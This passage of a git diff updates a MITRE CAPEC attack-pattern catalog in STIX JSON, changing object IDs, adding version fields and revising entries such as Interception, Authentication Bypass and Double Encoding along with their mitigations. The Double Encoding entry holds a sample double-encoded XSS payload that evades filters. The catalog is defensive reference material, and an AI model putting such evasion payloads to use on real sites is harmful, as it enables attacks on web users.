"attack-pattern--18f9508a-8fa0-49d5-8886-b877d2f4592d" + "target_ref": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a" }, { "name": "API Manipulation", "description": "An adversary manipulates the use or processing of an Application Programming Interface (API) resulting in an adverse impact upon the security of the system implementing the API. This can allow the adversary to execute functionality not intended by the API implementation, possibly compromising the system which integrates the API. API manipulation can take on a number of forms including forcing the unexpected use of an API, or the use of an API in an unintended way. For example, an adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution. Another example could be API methods that should be disabled in a production application but were not, thus exposing dangerous functionality within a production environment.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -2328,15 +2344,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--75e900ac-7c03-4c76-b14c-0e08219af9c8" + "id": "attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd" }, { "name": "Authentication Abuse", "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", @@ -2361,15 +2378,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9f750117-9ea1-4271-9542-0713fd01c9fd" + "id": "attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074" }, { "name": "Authentication Bypass", "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -2394,15 +2412,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--06b46da1-d02c-40f2-91c0-4e6ca5790843" + "id": "attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb" }, { "name": "Excavation", "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes. This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -2433,68 +2452,69 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0001e167-6f50-4e20-8245-7982771299ec" + "id": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-116-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", "type": "course-of-action", - "id": "course-of-action--129125c8-ce3e-423a-90a3-bb4deb70a9fe" + "id": "course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--42324a86-fa31-49ef-be54-69625d8465ab", - "source_ref": "course-of-action--129125c8-ce3e-423a-90a3-bb4deb70a9fe", + "id": "relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4", + "source_ref": "course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0001e167-6f50-4e20-8245-7982771299ec" + "target_ref": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-116-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", "type": "course-of-action", - "id": "course-of-action--103014b5-e93c-432a-a220-a091965f60b0" + "id": "course-of-action--8981135f-0874-4377-91a7-60102c6c6d08" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d588bd7f-bd60-4f8b-aa11-081ede4864fa", - "source_ref": "course-of-action--103014b5-e93c-432a-a220-a091965f60b0", + "id": "relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8", + "source_ref": "course-of-action--8981135f-0874-4377-91a7-60102c6c6d08", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0001e167-6f50-4e20-8245-7982771299ec" + "target_ref": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1" }, { "name": "Interception", - "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream, influence the nature of the data transmitted, or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position himself so as to observe explicit data channels (e.g. network traffic) and read the content.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position himself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Man-In-the-Middle (MITM) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -2503,8 +2523,8 @@ }, { "source_name": "cwe", - "url": "http://cwe.mitre.org/data/definitions/300.html", - "external_id": "CWE-300" + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" } ], "x_capec_likelihood_of_attack": "Low", @@ -2522,40 +2542,41 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--55bb3a99-3fea-454f-b54a-40c00ba9d95e" + "id": "attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-117-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", "type": "course-of-action", - "id": "course-of-action--379b9d48-d8a7-41b1-8c00-9c6830c995df" + "id": "course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--960c9b4f-2d64-4f6f-9898-3865af9cde98", - "source_ref": "course-of-action--379b9d48-d8a7-41b1-8c00-9c6830c995df", + "id": "relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d", + "source_ref": "course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55bb3a99-3fea-454f-b54a-40c00ba9d95e" + "target_ref": "attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee" }, { "name": "Choosing Message Identifier", "description": "This pattern of attack is defined by the selection of messages distributed over via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", @@ -2605,65 +2626,66 @@ "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--28839eee-d908-4d49-b61f-0560183fb928" + "id": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "name": "coa-12-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", "type": "course-of-action", - "id": "course-of-action--b2fdc424-4659-457d-b742-3a809b208c18" + "id": "course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--126c8795-36ec-4bcf-95d2-f1d5e08e2c09", - "source_ref": "course-of-action--b2fdc424-4659-457d-b742-3a809b208c18", + "id": "relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a", + "source_ref": "course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--28839eee-d908-4d49-b61f-0560183fb928" + "target_ref": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "name": "coa-12-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", "type": "course-of-action", - "id": "course-of-action--0731bdef-1e94-4bfb-99dc-0fe98be0e43f" + "id": "course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6b3bd6bd-d275-459d-b996-8e35351d605f", - "source_ref": "course-of-action--0731bdef-1e94-4bfb-99dc-0fe98be0e43f", + "id": "relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4", + "source_ref": "course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117", "relationship_type": "mitigates", - "target_ref": "attack-pattern--28839eee-d908-4d49-b61f-0560183fb928" + "target_ref": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1" }, { "name": "Double Encoding", "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -2749,190 +2771,191 @@ "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "id": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.", "type": "course-of-action", - "id": "course-of-action--e30069ef-47f0-4bad-a1ca-881c17cd8c30" + "id": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--652a08f9-cfbc-471f-94aa-97d94605098a", - "source_ref": "course-of-action--e30069ef-47f0-4bad-a1ca-881c17cd8c30", + "id": "relationship--68570b2d-3374-4fb3-bb7c-1c2b6b87d903", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", "type": "course-of-action", - "id": "course-of-action--1f793721-42b4-4c42-bf8d-4cf88a830267" + "id": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9dce9158-7ecb-4a35-87c8-919e8717c17f", - "source_ref": "course-of-action--1f793721-42b4-4c42-bf8d-4cf88a830267", + "id": "relationship--43ad5189-f992-454a-bb64-130c06a71e46", + "source_ref": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", "type": "course-of-action", - "id": "course-of-action--137932dd-0498-4500-9a8b-ff29e913a1f3" + "id": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--86093d86-6252-4515-b025-56f3ec0219d7", - "source_ref": "course-of-action--137932dd-0498-4500-9a8b-ff29e913a1f3", + "id": "relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", "type": "course-of-action", - "id": "course-of-action--7ca1b98c-a3d7-4859-a784-75ff258765c8" + "id": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--40453028-b3f6-4267-bb50-55b03d77398c", - "source_ref": "course-of-action--7ca1b98c-a3d7-4859-a784-75ff258765c8", + "id": "relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Refer to the RFCs to safely decode URL.", "type": "course-of-action", - "id": "course-of-action--8d8aa558-cac2-4d1b-b1e1-a11915a268b8" + "id": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d9485959-4096-4b7d-8e0e-f451a4ef1f57", - "source_ref": "course-of-action--8d8aa558-cac2-4d1b-b1e1-a11915a268b8", + "id": "relationship--c7501a8c-7f42-4536-8b86-125603eaba9d", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", "type": "course-of-action", - "id": "course-of-action--241842ea-2c29-4aa0-b497-a6a41f2fde99" + "id": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c8ef5625-9222-42ea-81b9-ff292ff18dd7", - "source_ref": "course-of-action--241842ea-2c29-4aa0-b497-a6a41f2fde99", + "id": "relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--976a21a0-e026-4b8b-b3a7-a48e8edc972e" + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-120-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", "type": "course-of-action", - "id": "course-of-action--8d8baedc-2a15-425c-8760-dcb501c425c9" + "id": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a2004fa8-5ced-41f9-9ab0-8f1bd56f4656", - "source_ref": 